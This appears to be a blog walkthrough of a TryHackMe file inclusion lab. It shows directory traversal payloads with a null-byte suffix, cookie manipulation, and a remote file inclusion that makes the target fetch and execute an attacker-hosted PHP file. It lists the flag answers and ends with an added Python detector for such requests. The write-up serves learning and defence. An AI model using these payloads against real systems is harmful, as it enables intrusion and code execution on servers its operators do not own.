TryHackMe | File inclusion

Iam_Wander
3 min read · May 2, 2023

This snapshot depicts the successful completion of the file inclusion vulnerability room.

A walkthrough of the solutions for the challenge section of the TryHackMe File Inclusion Vulnerability room. https://tryhackme.com/room/fileinc

To answer the questions successfully, make sure the attached VM is up and running, then visit (in my case): http://10.10.60.78/challenges/index.php

Question 1.
Capture Flag1 at /etc/flag1

Upon visiting lab1, we are presented with an input form. We could write anything to see what parameters we get.

Solution:

Upon writing welcome, we see these parameters.

Time to find the request method for the input form by inspecting the elements.

The form uses a GET request, as highlighted in blue.

Use the curl command to further exploit the form.

Ensure your version is up to date by running: sudo apt update
Run the above command in the terminal.

Hurrah! You found the flag

Ans: F1x3d-iNpu7-f0rrn

Question 2.

Capture Flag2 at /etc/flag2

Starting lab2, we are presented with a blank page. Refresh the page.

Upon refreshing the page, we see a welcome guest message.

We could use Burp Suite to send requests as admin and manipulate the page to our liking.

Try changing ‘Guest’ to ‘Admin’ to see the admin message
You are admin now

Proceed to get flag2 at /etc/flag2 using the directory traversal method.

i.e. file=../../../../etc/flag2%00

Locate the flag at the end of the page.

Hurrah! You got the flag

Ans: c00k13_i5_yuMmy1

Question 3.

Capture Flag3 at /etc/flag3

Here, we will be using curl to send a POST request to the server.

where -X sets the method to POST, -d is the data, and -o - is the output

Hurrah! You got the flag

Ans: P0st_1s_w0rk1in9

Question 4.

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

First thing is to understand what RCE is. Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Try writing anything in the input form to see how the URL behaves.

Submitting ‘hi’ in the input gives you the URL below

http://10.10.48.107/playground.php?file=hi

Now, for our RCE to work, we need to direct this website to our own server. In our case we need to make a cat.txt file whose contents are malicious PHP code: <?PHP print exec('hostname'); ?> or <?PHP echo ('hostname'); ?>

Below is a screenshot showing how to make a .txt file from the terminal.

Host your webserver with python3.

Note: You can select an IP and port of your choice. In this case, my selection is 10.13.23.11 8000
Connect the webserver to our attacking server as shown above.

Bingo! We got the flag

Ans: lfi-vm-thm-f8c5b1a78692
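
Seen from the defending side, all four labs push the same kinds of value (a ../ path, a trailing %00, or a full URL) into the application through different parts of the request. The detector below is an added example, not part of the original walkthrough or the room; the function names, paths, cookie names and sample requests are constructed for illustration, and it goes slightly beyond the labs by also undoing nested percent-encoding.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")   # a ".." path segment
REMOTE = re.compile(r"^\s*(?:https?|ftp)://", re.I)      # value is itself a URL

def classify_value(raw):
    """Return the file-inclusion indicators found in one parameter value."""
    value = raw
    for _ in range(3):                 # undo nested percent-encoding (%252e -> %2e -> .)
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    findings = []
    if "\x00" in value:                # %00 used to cut off an appended suffix
        findings.append("null-byte")
        value = value.replace("\x00", "")
    if TRAVERSAL.search(value):
        findings.append("path-traversal")
    if REMOTE.match(value):
        findings.append("remote-url")
    return findings

def scan_request(url, body="", cookie=""):
    """Check query string, form body and cookies; map 'where:name' to findings."""
    sources = {
        "query": parse_qsl(urlsplit(url).query, keep_blank_values=True),
        "body": parse_qsl(body, keep_blank_values=True),
        "cookie": [tuple(p.strip().split("=", 1)) for p in cookie.split(";") if "=" in p],
    }
    report = {}
    for where, pairs in sources.items():
        for name, value in pairs:
            hits = classify_value(value)
            if hits:
                report[f"{where}:{name}"] = hits
    return report

# Constructed sample requests, one per delivery channel (not captured traffic).
SAMPLES = [
    {"url": "/playground.php?file=hi"},
    {"url": "/lab.php?file=../../../../etc/flag1"},
    {"url": "/lab.php", "cookie": "sid=abc; page=..%2f..%2fetc%2fflag2%00"},
    {"url": "/lab.php", "body": "file=../../../../etc/flag3%00"},
    {"url": "/playground.php?file=http://198.51.100.7:8000/cat.txt"},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", scan_request(**sample))
```

A check like this belongs in logging or a WAF rule as a signal only; the fix on the application side is to map the parameter to a fixed allowlist of files instead of passing it to include.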